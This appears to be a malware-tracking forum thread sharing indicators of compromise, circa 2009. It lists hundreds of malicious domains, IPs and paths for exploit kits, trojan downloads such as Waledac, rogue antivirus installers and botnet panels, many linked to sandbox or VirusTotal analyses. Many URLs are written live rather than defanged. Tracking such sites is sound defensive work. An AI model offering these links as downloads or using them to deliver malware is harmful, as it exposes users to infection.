84.244.138.55/ase/?8ca27317863d8812f429a9eae57ac422292fe38932698e9fde1f2dd3c4bbf4a58a12642e80fa68ce4d916e93e17562fe95930129e9fd1f8ab98f7b02d272b439
84.244.138.55/ase/?h=5ac0i?892bd46e0100f07002da639a9a060000000002c15031930001040900000000170
84.244.138.55/ase/?t=3
84.244.138.55/ts/in.cgi?lapp
94.75.234.35/data/u560x417145113
94.75.234.35/html/b874550815x19
94.75.234.35/data/ffc306323898
94.75.234.35/data/u560s1x25980757
94.75.234.35/html/kpnm1225628204
athlon.sibers.com/111.exe
benyodil.cn/pages2.html
benyodil.cn/pagess.html
benyodil.cn/senks/al1/1/404.php
benyodil.cn/senks/al1/1/flash.php
benyodil.cn/senks/al1/1/getexe.php?h=11
benyodil.cn/senks/al1/1/info.php
benyodil.cn/senks/al1/2/index.php
benyodil.cn/senks/al1/2/pdf.php
cfsiqejclo.com/progs/jokkl/aqmznana.php
cfsiqejclo.com/progs/jokkl/bxyyyyl.php
cfsiqejclo.com/progs/jokkl/cclmmmzmna
cfsiqejclo.com/progs/jokkl/dzzaaanxkx.php
cfsiqejclo.com/progs/jokkl/eoooocccpd.php?adv=adv656
cfsiqejclo.com/progs/jokkl/hhrrre.php?adv=adv656&code1=KNIH&code2=0154&id=-1331090992&p=0
cfsiqejclo.com/progs/jokkl/liivvwf.php
cfsiqejclo.com/progs/jokkl/qmzhr.php
cfsiqejclo.com/progs/jokkl/vrrsfssgt.php
cfsiqejclo.com/uniq.php?id=-1331090992&p=0
ctfmon.info/cd/cd.php?id=&ver=nz0
ctfmon.info/cd/cd.php?id=1C9A716AFEE7CF2&ver=nz6
ctfmon.info/cd/uns.php?id=&ver=nz0
dfhatnjfjw.net/ccsuper0.php
dfhatnjfjw.net/ccsuper1.php
dfhatnjfjw.net/ccsuper2.php
divinets.cn/xts/in.cgi?7
divinets.cn/z/1.htm
excelsystems.cn/soft.php?aid=0860&d=1&refer=be4f5fba9
firstgate.ru/33/cache/flash.swf
firstgate.ru/33/cache/readme.pdf
firstgate.ru/33/load.php?id=0
firstgate.ru/33/load.php?id=4
firstgate.ru/33/t.php
gbvql.wwlax.com/get_frst.php?uid=3423165F-07C8-1033-0623-990000000001
gbvql.wwlax.com/gt_bd_93.php
gbvql.wwlax.com/gt_ky.php
globalstats.net/loads/goo.exe
globalstats.net/loads/instcash.exe
globalstats.net/yes/index.php
globalstats.net/yes/load.php
gogo2me.net/.dif/go.php?sid=1
gogo2me.net/.go/check.html
gogo2me.net/.lck/?1e0f7f566750932cf9b96399a3a313ab712552ca04c019d33f696298486535fb54f7049de7dc2d36eb11acb071200d262a7deba7573384091c4d7c8de7b5302c
gogo2me.net/.lck/?t=3
google-analistyc.net/in.cgi?5
gujjipuzzi.net/in.cgi?pipka2
gujjipuzzi.net/su/in.cgi?19
hansali4.com/731l2.exe
members.upc.pl/i.lemecha/index.gif
mystats.cn/?cid=streamb&code=strim
mystats.cn/000/cscpu2.php?t=img&cid=amazonka&n=1&mode=html
mystats.cn/000/cscpu2.php?t=img&cid=skype&n=1&mode=html
mystats.cn/000/cscpu2.php?t=img&cid=streamb&n=1&mode=html
mystats.cn/general/mzn/promo.jpg
mystats.cn/general/mzn/promobanner.php
mystats.cn/general/skype/promo.jpg
mystats.cn/general/skype/promobanner.php
mystats.cn/general/skype/skype.gif
mystats.cn/general/skype/stats.php
mystats.cn/streamb/hdtvauction/hdtv-banner.jpg
mystats.cn/streamb/hdtvauction/popup.php
mystats.cn/streamb/hdtvauction/ppc.php
nolagtime.com/gwc.txt
nolagtime.com/p33r/?v=19&aic=0&p=6150&su=0&fu=0
pakras.com/fky/3rkour.dat
pakras.com/fky/mp.dat
pakras.com/fky/zro.dat
pakras.com/iz98kbhg/404.php
pakras.com/iz98kbhg/flash.php
pakras.com/iz98kbhg/getexe.php?h=11
pakras.com/iz98kbhg/getexe.php?h=31
pakras.com/iz98kbhg/info.php
pakras.com/iz98kbhg/pdf.exp.php
pakras.com/oy5x552m/info.php
pakras.com/tn99y3w3/info.php
pakras.com/u57cwchq/info.php
porn-money.org/default.cgi
porn-money.org/in.cgi?2
reddii.ru/traffic/sploit1/?1850ytdbVddYad
reddii.ru/traffic/sploit1/?470ybVYadbtbt
reddii.ru/traffic/sploit1/getexe.php?h=11
reddii.ru/traffic/sploit1/getfile.php?f=swf
rifnasax.cn/in.cgi?2
rifnasax.cn/nuc/exe.php
rifnasax.cn/nuc/index.php
sexbases.cn/gr.php
sexbases.cn/in.cgi?15
sexbases.cn/in.cgi?20
sexbases.cn/vas.php
sexbases.cn/wed.html
teleporn.net/in/init.php
teleporn.net/stat/cache/flash.swf
teleporn.net/stat/cache/readme.pdf
teleporn.net/stat/index.php
teleporn.net/stat/load.php?id=0
teleporn.net/stat/load.php?id=4
thehugetitstop.cn/1/in.php
thehugetitstop.cn/1/load.php?id=1
thehugetitstop.cn/1/load.php?id=6
thehugetitstop.cn/1/pdf.php
thehugetitstop.cn/dontstop.html
thehugetitstop.cn/kadastr.html
thehugetitstop.cn/moon.html
topdaynews.eu/norad/robo.php?r=1
topdaynews.eu/norad/robo.php?r=4
topdaynews.eu/norad/robo.php?r=5
topdaynews.eu/norad/robo.php?r=6
topdaynews.eu/norad/tasks/US
tozxiqud.cn/in.cgi?2
tozxiqud.cn/nuc/exe.php
tozxiqud.cn/nuc/index.php
vpsspeedin.ru/1/in.php
vpsspeedin.ru/1/load.php?id=1
vpsspeedin.ru/1/load.php?id=6
vpsspeedin.ru/1/pdf.php
www.dearbornbarry.com/images/1/bin/default.exe
www.dearbornbarry.com/images/1/bin/hxS.exe
www.dearbornbarry.com/images/1/bin/load.exe
www.dearbornbarry.com/images/1/bin/test.exe
www.dearbornbarry.com/images/1/index.php
www.dearbornbarry.com/images/1/load.php?com=cfecdb276f634854f3ef915e2e980c31
www.dearbornbarry.com/images/1/load.php?mdc=0.46815614385941473
www.dearbornbarry.com/images/1/load.php?mdc=0.6208075561393851
www.dearbornbarry.com/images/1/load.php?mdc=0.7461394047952373
www.dearbornbarry.com/images/1/load.php?mdc=0.9528790372625641
www.messangerupdate.com/conf/BHOversion.asp
www.messangerupdate.com/conf/conf/conf-new.aspx
www.messangerupdate.com/conf/msgasst.dll
www.messangerupdate.com/conf/msgutil.dll
www.onlineanalytics.cn/files/20026.exe
yourwindowsvista.com/cd/cd.php?id=1C9A716AFEE7CF2&ver=nz6
0u0u.ru/nagios/cd.php?userid=--
0u0u.ru/nagios/cd.php?userid=14032009_065836_4950250
0u0u.ru/nagios/dan.php
0u0u.ru/nagios/datu.php
0u0u.ru/nagios/sdt.php
193.138.172.14/install3/security-update-KB944085.exe
193.138.172.14/install4/security-update-G5664085.exe
193.138.172.14/install4/security-update-KB964085.exe
208.43.162.84-static.reverse.softlayer.com/40E8000E4457572D414D31443831323036376C0000018766000000007600000642EB000530B8BEC3C8
208.43.162.84-static.reverse.softlayer.com/40E8000E4457572D414D31443831323036376C000001876600000001760000005DEB000530C7CDD2D7
208.43.162.84-static.reverse.softlayer.com/40E8000E4457572D414D31443831323036376C0000018A66000000007600000642EB000530FE040A0F
208.43.162.84-static.reverse.softlayer.com/40E8000E4457572D414D31443831323036376C0000018A6600000001760000005DEB000530FC02070D
64.151.72.252/aaqqe?sid=648&d=15_22_40&v=945
64.151.72.252/aaqqe?sid=672&d=15_22_58&v=898
64.151.72.252/aaqqe?sid=703&d=15_22_43&v=977
64.151.72.252/aaqqe?sid=713&d=15_22_49&v=943
64.191.15.133/rio?d=kjdd&j=jjjjjs&t=zbxbhcuzafzz&k=kkkkkkklpqkkkkkk&y=yfejdjeh&x=ydci
64.191.15.133/rio?s=zyss&f=fffffo&o=uwswcxpuva&g=mmggggggghlm&w=wwww&l=lllsrw&h=mqmhukus
64.191.15.133/rio?u=bauuuuuuudacyc&r=fasx&e=lqkkeeee&x=xxxycdxx&p=pppppwva&s=yhbcccxb
66.45.246.146/40E8000879B9FABC48B65F576C0000014166000000007600000177EB000530F2F19529
66.90.101.177/chimera/ldr.exe
66.90.101.177/chimera/nDler.exe
66.90.101.177/ldr/dl/chMiB.exe
66.90.101.177/ldr/dl/minisvr4.exe
66.90.101.177/ldr/dl/mSrv.exe
66.90.101.177/ldr/dl/zchMiB.exe
66.90.101.177/ldr/files/mSrv.exe
66.90.101.177/ldr/files/zchMiB.exe
66.96.229.213/rio?d=kjdd&e=eeeeenkmimsnfk&a=hmggaaaaaa&x=xxcdxxxxxx&j=jqpupvyvmomp
66.96.229.213/rio?m=tsmmmmmmmvsu&e=imsnfklqkk&f=fffffffg&f=klfffffffm&u=afvz&w=aiyddl
66.96.229.213/rio?w=dcwwwwwwwfceaekf&i=jopuooiiiiiiii&v=abvvvvvvvcbgyvei&z=mzfz
76.191.98.246/nyfa32.exe
84.16.247.29/maldef09/install.php?track_id=10232
85.17.166.175/aaqqe?sid=684&d=15_22_55&v=911
85.17.166.175/aaqqe?sid=702&d=15_22_52&v=904
85.17.166.218/dwn/kb802348.dll
96.9.142.101/nyfa32.exe
amerika.by/libraries/tcpdf/images/spl/cfg/fies/load.php?id=31
amerika.by/libraries/tcpdf/images/spl/cfg/fies/pdf.php?id=31
benyodil.cn/pagess.html
benyodil.cn/senks/al1/1/404.php
benyodil.cn/senks/al1/1/flash.php
benyodil.cn/senks/al1/1/getexe.php?h=11
benyodil.cn/senks/al1/1/info.php
benyodil.cn/senks/al1/2/index.php
benyodil.cn/senks/al1/2/load.php
benyodil.cn/senks/al1/2/pdf.php
bestlotron.cn/in.cgi?cocacola51
betstarwager.cn/in.cgi?cocacola25
betstarwager.cn/in.cgi?cocacola26
betstarwager.cn/in.cgi?cocacola51
betstarwager.cn/in.cgi?cocacola73
betstarwager.cn/in.cgi?cocacola74
bizoplata.ru/1/in.php
bizoplata.ru/1/load.php?id=1
bizoplata.ru/1/load.php?id=6
bizoplata.ru/1/pdf.php
bizoplata.ru/exchange.html
bizoplata.ru/funt.html
bizoplata.ru/pay.html
bizoplata.ru/s/in.cgi?5
bizoplata.ru/topcurs.html
botconnet.cn/nuc/index.php
bulkbin.cn/in.cgi?2&group=dns01&seoref=¶meter=$keyword&keyword=$keyword&se=$se&ur=1
clearadvare2008.cn/in.cgi?8
clickcouner.cn/?117f66bf567c1382b6d7ba2ad370c82ce78ed4c3c24b143599e9a15b876c0f9b20470530a0e11f40f1a5d5da8ed912c4d5236110653fafd952640bf635e837e2
clickcouner.cn/?3a8f76910fa0181ba6b5479a46825e4cafb742be29b6894b397da137363bed3cc794a770116e95afe10b7c4c5c4bb4ebcd2454a0636855f26e77bf36f0b47146
clickcouner.cn/?54cea7d7c7682f27df5070357c7a60e747f1b261e4d5d55b9fd8f8880e4a525ee4fc4b965e78fbbe4587ec538b22c2a078d2218a087d7a1b2fda9cff3739a4c2
clickcouner.cn/?8cc76fb22005a8b936b886a6800f481da000c0c523a044a870836623e8daea4f679f86f35ca39c72a0482f6675a1a126d9c13b9073fb6c36b82873e1c9394baf
clickcouner.cn/?t=5
d1gix.net/forum/index.php
d1gix.net/forum/load.php?id=1301
d1gix.net/forum/load.php?id=1301&spl=4
d1gix.net/forum/pdf.php?id=1301
desktoprepairpackage.com/secure/3e448f5c3098045f42569da80c168ea7/49b6f34a/bestvirusremover2009.com/virusremover2009_setup_free_rezer_en.exe
desktoprepairpackage.com/secure/9417212421c1fb9821e530ddbd2b7c34/49b6f21e/bestvirusremover2009.com/virusremover2009_setup_free_rezer_en.exe
download.advancesoftwaretool.com/secure/4308c3fd58e7dabcf7f5ffd3b21eca90/49ba4ac1/bestvirusremover2009.com/virusremover2009_setup_free_rezer_en.exe
download.desktoprepairpackage.com/secure/3e448f5c3098045f42569da80c168ea7/49b6f34a/bestvirusremover2009.com/virusremover2009_setup_free_rezer_en.exe
download.desktoprepairpackage.com/secure/9417212421c1fb9821e530ddbd2b7c34/49b6f21e/bestvirusremover2009.com/virusremover2009_setup_free_rezer_en.exe
dlmaldef09.com/maldef09/install.php?track_id=10232
drebopoer.com/embded/mess_add.txt
drebopoer.com/embded/online.php?id=444884634282223285838277238378&country=United%20States
drebopoer.com/embded/redirect_fake.txt
drebopoer.com/embded/search_fid.txt
drebopoer.com/kept.exe
firstgate.ru/stat/404.php
firstgate.ru/stat/flash.php
firstgate.ru/stat/getexe.php?h=11
firstgate.ru/stat/traff.php
gowayscan.com/?uid=12405
gujjipuzzi.net/in.cgi?pipka2
gujjipuzzi.net/su/in.cgi?19
hayboxiw.cn/nuc/exe.php
hayboxiw.cn/nuc/index.php
hs.3-46.zlkon.lv/40E8000879B9FABC48B65F576C0000014166000000007600000177EB00053059300FA4
ipredator.ru/7/in.cgi?3
ipredator.ru/7/in.cgi?default
in4co.com/cki.php?uid=12405
in4ik.com/download/InternetAntivirusPro.exe
litedownloadseek.cn/in.cgi?cocacola25
litedownloadseek.cn/in.cgi?cocacola26
pakras.com/fky/3rkour.dat
pakras.com/fky/mp.dat
pakras.com/fky/zro.dat
pakras.com/n2by3ywf/404.php
pakras.com/n2by3ywf/flash.php
pakras.com/n2by3ywf/getexe.php?h=11
pakras.com/n2by3ywf/info.php
pakras.com/n2by3ywf/pdf.exp.php
pakras.com/ntmx13a5/404.php
pakras.com/ntmx13a5/flash.php
pakras.com/ntmx13a5/info.php
pakras.com/ntmx13a5/pdf.exp.php
reddii.ru/traffic/sploit1/?130ybabVxtxdd
reddii.ru/traffic/sploit1/getexe.php?h=11
reddii.ru/traffic/sploit1/getfile.php?f=pdf
reddii.ru/traffic/sploit1/getfile.php?f=vispdf
rotateonads.com/files/1000.exe
rotateonads.com/files/MPh.exe
sexbases.cn/gr.php
sexbases.cn/in.cgi?20
sexbases.cn/vas.php
sexbases.cn/wed.html
strhq.cn/tds_a/go.php?id=2
thehugetitstop.cn/1/in.php
thehugetitstop.cn/1/load.php?id=1
thehugetitstop.cn/1/load.php?id=6
thehugetitstop.cn/1/load.php?id=3
thehugetitstop.cn/1/pdf.php
thehugetitstop.cn/answer.html
thehugetitstop.cn/dontstop.html
thehugetitstop.cn/newsstop.html
thehugetitstop.cn/s/in.cgi?5
thehugetitstop.cn/soundthis.html
tombak-story.comimages/pics/system/load.php?id=33577
tombak-story.comimages/pics/system/pdf.php?id=33577
tombak-story.com/images/pics/system/index.php
tozxiqud.cn/in.cgi?2
tozxiqud.cn/in.cgi?4
tozxiqud.cn/nuc/exe.php
tozxiqud.cn/nuc/index.php
traf.asia/stat.php
trypetstore.cn/file1.exe
trypetstore.cn/in.php
trypetstore.cn/nop/tds2.php
trypetstore.cn/robo/f/123.exe
trypetstore.cn/robo/files/tasks/AC
trypetstore.cn/robo/robo.php?r=1
trypetstore.cn/robo/robo.php?r=4
trypetstore.cn/robo/robo.php?r=5
trypetstore.cn/robo/robo.php?r=6
trypetstore.cn/sploits/pdf.php?id=2
usa.amerika.by/1.exe
vpsspeedin.ru/1/in.php
vpsspeedin.ru/1/load.php?id=3
vpsspeedin.ru/1/pdf.php
www.abdomains.cn/multi/bact.php
www.abdomains.cn/multi/bcmd.php
www.abdomains.cn/multi/checkupdate.php
www.abdomains.cn/multi/dirlist.php
www.abdomains.cn/multi/filelist.php
www.abdomains.cn/multi/getemails.php
www.abdomains.cn/multi/isho.txt
www.abdomains.cn/multi/takida.txt
z.lovertoorcn.cn/cp/l/5/bb810243e44b3a69d8de712f1976a635
z.lovertoorcn.cn/cp/r/5/bb810243e44b3a69d8de712f1976a635
z.lovertoorcn.cn/cp/t
zatura.cn/prohit/demon.bin
zatura.cn/prohit/source.php
zatura.cn/sad/demo.exe
zlzu.ru/damma/index.php
zlzu.ru/damma/load.php
xoomer.alice.it/hogroves/file.exe
xoomer.alice.it/hogroves/InternetAntivirusPro.exe
e.see-something.cn/m/l/0/3d4f38cb2f508d50c37678cfffb60492
e.see-something.cn/m/l/3/7d9b68a88bc55148e1ab6f92be144574
e.see-something.cn/m/l/4/c30eebe3a7c0158a45a4f3966ffd2216
e.see-something.cn/m/l/6/74a2593a472f17e2e0a7f5be342b2371
e.see-something.cn/m/r/0/3d4f38cb2f508d50c37678cfffb60492
e.see-something.cn/m/r/3/7d9b68a88bc55148e1ab6f92be144574
e.see-something.cn/m/r/4/c30eebe3a7c0158a45a4f3966ffd2216
e.see-something.cn/m/r/6/74a2593a472f17e2e0a7f5be342b2371
e.see-something.cn/m/t
www.microsoft.com.v6.update.js.status200.should-be.cn/
www.microsoft.com.v6.update.js.status200.should-be.cn/ar.cn
www.microsoft.com.v6.update.js.status200.should-be.cn/m/l/13/aa3119ba7581b0bf3e5b4b3c7eb63f63
www.microsoft.com.v6.update.js.status200.should-be.cn/m/l/18/93aeb808d1c98aee14aef249486f1430
www.microsoft.com.v6.update.js.status200.should-be.cn/m/r/13/aa3119ba7581b0bf3e5b4b3c7eb63f63
www.microsoft.com.v6.update.js.status200.should-be.cn/m/r/18/93aeb808d1c98aee14aef249486f1430
www.microsoft.com.v6.update.js.status200.should-be.cn/m/t
www.microsoft.com.v6.update.js.status200.should-be.cn/p/o/o.php?2
www.microsoft.com.v6.update.js.status200.should-be.cn/st6.php
www.microsoft.com.v6.update.js.status200.should-be.cn/support.cn/forum.php
www.microsoft.com.v6.update.js.status200.should-be.cn/support.cn/index.php
www.microsoft.com.v6.update.js.status200.should-be.cn/support.cn/javac.php
Just some playing around stuff, nothing too serious. ;)
-
Some of my dingleberries from last few weeks :P
Just some playing around stuff, nothing too serious. ;)
Looks like a long night for me. ;) You did that on MWR some weeks ago. I had a lot of fun for a whole day. :)
-
...Santa Claus is coming to town...
;D
-
hxxp://239.by.ru
hxxp://4r.by.ru
hxxp://666-project.by.ru
hxxp://adminmail.by.ru
hxxp://ahf.by.ru
hxxp://ak-sh.by.ru
hxxp://aster2005.by.ru
hxxp://autolg.by.ru
hxxp://avsimirc.by.ru
hxxp://beliy-medved.by.ru
hxxp://belsoch.by.ru
hxxp://belsurgery.by.ru
hxxp://big-mass.by.ru
hxxp://bulkin.by.ru
hxxp://ekaterininskay-shcool.by.ru
hxxp://extreme-ski.by.ru
hxxp://hrunsky.by.ru
hxxp://lakkmus.by.ru
hxxp://liceysk.by.ru
hxxp://margotour.by.ru
hxxp://medievalmusic.by.ru
hxxp://misham.by.ru
hxxp://muric.by.ru
hxxp://normforum.by.ru
hxxp://ochakovo.by.ru
hxxp://ondeep.by.ru
hxxp://poxe.by.ru
hxxp://rbook.by.ru
hxxp://rushops.by.ru
hxxp://sfchgu.by.ru
hxxp://team-sleep.by.ru
hxxp://testpoligon.by.ru
hxxp://thp8.by.ru
hxxp://wraith-pony.by.ru
hxxp://www.gvozd.by.ru
Now let's see to whom supposedly "all of the bases are belong to...",heh...i say in return, 1 ip to rule them all:
http://www.bfk.de/bfk_dnslogger_en.html?query=87.242.78.57#result
-
CM_MWR brought me up in a good mood (as he usually does),
so I thought of sharing the joy with others as well... ;)
http://www.google.com/search?hl=en&q=%22Index+of+%2F%22+mhstchk.php
-
Has been a few moons, hasnt it. ;D
-
Open dir,these are the ones that caught my attention though...
hxxp://glush.by.ru/agang.jar
http://www.virustotal.com/analisis/b50e6d91d682919f664d1b412fe51e7b
hxxp://glush.by.ru/settlers.jar
http://www.virustotal.com/analisis/0d4e1b9b172ba3663b2d5aeb8b39d3d2
========================
hxxp://javacsript.net/index/in.cgi?5
http://wepawet.iseclab.org/view.php?hash=237b6aae1fd55cb5517943b187f43488&t=1237979819&type=js
--->
hxxp://newsantimalware.com/412/
hxxp://newsantimalware.com/412/iepdf.php?f=new
hxxp://newsantimalware.com/412/load.php
---> Result: 5/40 (12.50%) :
http://www.virustotal.com/analisis/38b38ade6b7d019c5d0aa2f7c6f937d7
========================
hxxp://ayurvedaservicesindia.we.bs
http://wepawet.iseclab.org/view.php?hash=9f43c950049303a60e3755f92a9f07d1&t=1237981067&type=js
hxxp://extraspray.com/in.php?
hxxp://agkt.info/evo/count.php?o=7
========================
hxxp://drmituayurvedatreatments.we.bs
http://wepawet.iseclab.org/view.php?hash=761f6eb37181b4c5221f4b98340e194d&t=1237981408&type=js
hxxp://ftp.shmurge.com/get.php?id='
hxxp://stat.zima07.ru
hxxp://get.zima07.ru/pdf.php?acc=1
hxxp://get.zima07.ru/swf.php
hxxp://ftp.zima07.ru/run.php
hxxp://get.load-flash.com/out.php?click
There might be more crap in the same ip,haven't checked that though...
http://www.bfk.de/bfk_dnslogger_en.html?query=66.40.56.10#result
-
av fraud:
goscanfull.comredirect in the end to:
http://fusescan4.com/download/install.php
goscanplan.comredirect in the end to:
http://wayscan4.com/download/install.php
this ip is full of av fraud domains..
http://www.bfk.de/bfk_dnslogger_en.html?query=78.159.101.27#result
-
hxxp://ghthchinalimited.com.cn/admin/controller.php?action=bot&entity_list=
hxxp://turokgame.cn/bm/controller.php?action=bot&entity_list=
hxxp://attmyjoker.com/if/index.php
-
Waledac:
http://bestjournalguide.com/run.exe
http://urbanfear.com/run.exe
http://globalantiterror.com/run.exe
Redirects to exploits:
paintball2.by.ruhttp://wepawet.iseclab.org/view.php?hash=8e522d049a6411492d6ddea2013a3c47&t=1238017604&type=js
Contain iframe of pdf exploit:
http://29ka.by.ru/http://wepawet.iseclab.org/view.php?hash=5ba619da85a609ec2942b6e0417a728b&t=1238018761&type=js
the pfd exploit:
http://expresstv.co.il/un/pdf.phphttp://wepawet.iseclab.org/view.php?hash=98a40fb7fd2a5a04cb12d788d2c4665c&t=1238018870&type=js
the trojan he download:
http://expresstv.co.il/un/load.phphttp://www.virustotal.com/analisis/8f452239eb342ba3decd28a6ff241465
AV fraud:
vistastabilitynow.com
vistastabilitynow.net
scanalertspage.com
onlinescanservice.com
getscanonline.com
bestfiresfull.com
fuckmoneycash.com
bestfiresfull.com
yourstabilitysystem.com
popularpcscan.com
mostpopularscan.com
scanvistanow.net
-
the trojan he download:
What happens if its a transexual piece of malware ??? :D
-
the trojan he download:
What happens if its a transexual piece of malware ??? :D
i will change it to "it" for all the feminists here :P
-
Redirect to exploits:
http://baltstroi-spb.by.ruhttp://wepawet.iseclab.org/view.php?hash=d99f501d81c87b6e690fcd9147b6118e&t=1238072608&type=js
redirect to exploits:
http://hotjob.by.ruhttp://wepawet.iseclab.org/view.php?hash=dd67f744942bd4dfb62ca592269c85f7&t=1238072560&type=js
exploits and waledac Trojan in the end at:
http://dolpassgiven.ru/3/pdf.php
http://dolpassgiven.ru/3/load.php?id=3
http://www.virustotal.com/analisis/88095c3f38020917145ca045f5adbc60
http://anubis.iseclab.org/?action=result&task_id=120a06c16ed33fec4b9fb4b2a80db328e&format=html
-
Redirects to exploits:
http://vniic.by.ruhttp://wepawet.iseclab.org/view.php?hash=8578df10b9d0f8b53bb43a7b193b68c4&t=1238083841&type=js
exploits/Trojan Waledac:
http://dasretokfin.com/include/spl.phphttp://wepawet.iseclab.org/view.php?hash=d8ebd3a3d6bf7c41126a81b490f96294&t=1238084290&type=js
http://dasretokfin.com/load.phphttp://www.virustotal.com/analisis/c91540f8abbf3f49e981edb486790a25
---------------------------------------------
Redirects to exploits:
http://rootastic.by.ruhttp://wepawet.iseclab.org/view.php?hash=94d6673b07ddb8e91f85b0885415ab56&t=1238083887&type=js
Redirects to exploits:
http://gav-posad.by.ruhttp://wepawet.iseclab.org/view.php?hash=a137e822fc9460ba0006c09b97c5483e&t=1238084673&type=js
Redirects to exploits:
http://fastfood.by.ruhttp://wepawet.iseclab.org/view.php?hash=0f14d3e37ad232de59cd7b7b686486ae&t=1238085115&type=js
Redirects to exploits:
http://nemiroff.by.ruhttp://wepawet.iseclab.org/view.php?hash=5a96bc55863a40a5cbc20e87fda449b7&t=1238087155&type=js
Redirects to exploits:
http://kkff.by.ruhttp://wepawet.iseclab.org/view.php?hash=61bf7c4aae87094f6ff6d3b9b419f130&t=1238087090&type=js
Redirects to exploits:
http://amirag.by.ruhttp://wepawet.iseclab.org/view.php?hash=67052be5d4655c2ee3aca176fde97b25&t=1238087608&type=js
-
Redirects to exploits:
http://vniic.by.ruhttp://rootastic.by.ruhttp://gav-posad.by.ruhttp://fastfood.by.ruhttp://nemiroff.by.ruhttp://kkff.by.ruhttp://amirag.by.ru
All of them are at the same host :
http://www.malwaredomainlist.com/mdl.php?inactive=&sort=Date&search=87.242.78.57&colsearch=All&ascordesc=DESC&quantity=50&page=0
Whos has time to check more domains from this ip ?
http://www.bfk.de/bfk_dnslogger.html?query=87.242.78.57#result
-
Redirects to exploits:
http://vniic.by.ruhttp://rootastic.by.ruhttp://gav-posad.by.ruhttp://fastfood.by.ruhttp://nemiroff.by.ruhttp://kkff.by.ruhttp://amirag.by.ru
All of them are at the same host :
http://www.malwaredomainlist.com/mdl.php?inactive=&sort=Date&search=87.242.78.57&colsearch=All&ascordesc=DESC&quantity=50&page=0
Whos has time to check more domains from this ip ?
http://www.bfk.de/bfk_dnslogger.html?query=87.242.78.57#result
thats what ive been doing in the last few days :)
think i covered like 70% :P
-
http://rifnasax.cn/nuc/index.php
http://rifnasax.cn/nuc/spl/pdf.pdf
http://rifnasax.cn/nuc/exe.php
may be offline
http://livestats.co.cc/script.js
-
http://krona98.biz/opi/http://wepawet.cs.ucsb.edu/view.php?hash=03236ee924ddc9d03c2f11d176e3775c&t=1238262446&type=js
http://krona98.biz/opi/load.php?id=4http://www.virustotal.com/analisis/0f51acface4b59ccc14b48cd92beaaac 1/39
VBA32 3.12.10.1 2009.03.27 Worm.Win32.AutoRun.oik
-
http://ru98.biz/cgi-bin/wtsin.cgi?id=4
http://krona98.biz/ins/index.php
http://krona98.biz/myy/cache/readme.pdf
http://krona98.biz/myy/cache/flash.swf
http://krona98.biz/myy/load.php?id=4
http://krona98.biz/myy/load.php?id=5
-
rogue:
http://systemsecuritytool.com
http://system-tuner.net
http://getpcguard.com
http://systemsecurityonline.com
exploits+trojan:
http://blufda.com/
http://wepawet.iseclab.org/view.php?hash=9f5b70106e995d5f7a4e842f54cc3c29&t=1238414305&type=js
-
http://216.12.168.138/1/getexe.php?h=11
http://216.12.168.138/1/getfile.php?f=pdf
http://216.12.168.138/1/helper.xml
http://66.90.101.177/ldr/files/part.exe
http://66.90.101.177/ldr/files/minisvr4.exe
http://66.90.101.177/ldr/files/zchMiB.exe
http://basesrv.net/base/install.lib
http://basesrv.net/base/ntdll.exe
http://basesrv.net/bin/in.php
http://basesrv.net/bin/load.php?id=1
http://basesrv.net/bin/load.php?id=6
http://basesrv.net/bin/pdf.php
http://basesrv.net/load/ld.php?v=1&rs=76487-OEM-0083836-249893693295087&n=1&uid=1
http://basesrv.net/load/ld.php?v=1&rs=76487-OEM-0083836-249893693295087&n=1&uid=1&cc=0
http://basesrv.net/load/ld.php?v=1&rs=76487-OEM-0083836-249893693295087&n=1&uid=1&cc=0&cc=0
http://basesrv.net/load/ld.php?v=1&rs=76487-OEM-0083836-249893693295087&n=1&uid=1&cc=0&cc=0&cc=0
http://basesrv.net/update/delcache.exe
http://basesrv.net/update/load.exe
http://basesrv.net/update/loader_del.exe
http://basesrv.net/update/svchost.exe
http://bestfindahome.cn/findmeale.html
http://bestfindahome.cn/home.html
http://bestfindahome.cn/searchn.html
http://bizoplata.ru/monitoring.html
http://bizoplata.ru/onservice.html
http://bizoplata.ru/pay.html
http://nameashop.cn/in.cgi?income13
http://newsantimalware.com/720/load.php
http://nikodomain.info/in/init.php
http://pakras.com/c6p7fnqd/404.php
http://pakras.com/c6p7fnqd/flash.php
http://pakras.com/c6p7fnqd/getexe.php?h=11
http://pakras.com/c6p7fnqd/info.php
http://pakras.com/c6p7fnqd/pdf.exp.php
http://pakras.com/las/3rkour.dat
http://pakras.com/las/mp.dat
http://pakras.com/las/tos.dat
http://rec.bestrevenue.net/get_93.php?p=148
http://rec.bestrevenue.net/get_93.php?p=152
http://rec.bestrevenue.net/get_93.php?p=155
http://rec.bestrevenue.net/get_93.php?p=156
http://rec.bestrevenue.net/get_93.php?p=157
http://rec.bestrevenue.net/get_93.php?p=162
http://reddii.ru/traffic/sploit1/?263bYYYbaYtbt
http://reddii.ru/traffic/sploit1/getexe.php?h=11
http://reddii.ru/traffic/sploit1/getfile.php?f=swf
http://rifnasax.cn/nuc/exe.php
http://rifnasax.cn/nuc/index.php
http://rifnasax.cn/nuc/spl/pdf.pdf
http://sadcwed.hostindianet.com/cache/flash.swf
http://sadcwed.hostindianet.com/cache/readme.pdf
http://sadcwed.hostindianet.com/index.php
http://teleporn.net/fix.exe?id=EB52EAEE-B8A4-45F1-AE06-1918472E1B0D
http://teleporn.net/rep.php?id=EB52EAEE-B8A4-45F1-AE06-1918472E1B0D
http://teleporn.net/stat/cache/flash.swf
http://teleporn.net/stat/cache/readme.pdf
http://teleporn.net/stat/index.php
http://teleporn.net/stat/load.php?id=0
http://teleporn.net/stat/load.php?id=4
http://ultradant.cn/dis9/index.php
http://ultradant.cn/dis9/load.php
http://zzzz.hostindianet.com/load.php?id=0
http://zzzz.hostindianet.com/load.php?id=4
http://66.90.101.177/ldr/files/minisvr4.exe
http://66.90.101.177/ldr/files/part.exe
http://66.90.101.177/ldr/files/zchMiB.exe
http://74.55.52.170/p1212/2.0/w.bin?226179
http://92.62.101.118/40E8001430303030303030303030303030303030303031306C0000003766000000007600000642EB0005302663788C
http://92.62.101.118/40E8001430303030303030303030303030303030303031306C0000016666000000007600000642EB0005301D414F5C
http://94.247.2.122/2.gif?nocache=0.3735362
http://94.247.2.122/2.gif?nocache=0.9495566
http://94.247.2.122/2.gif?nocache=1.401764E-02
forwrd.h15.ru.e09f1b7882de0743.beencn.cn/china.cn/
forwrd.h15.ru.e09f1b7882de0743.beencn.cn/cp/l/15/02c9be1ab189280058cd0585b0abebc8
forwrd.h15.ru.e09f1b7882de0743.beencn.cn/cp/l/3/275eefe4b40b934bedd87eb81b293bfd
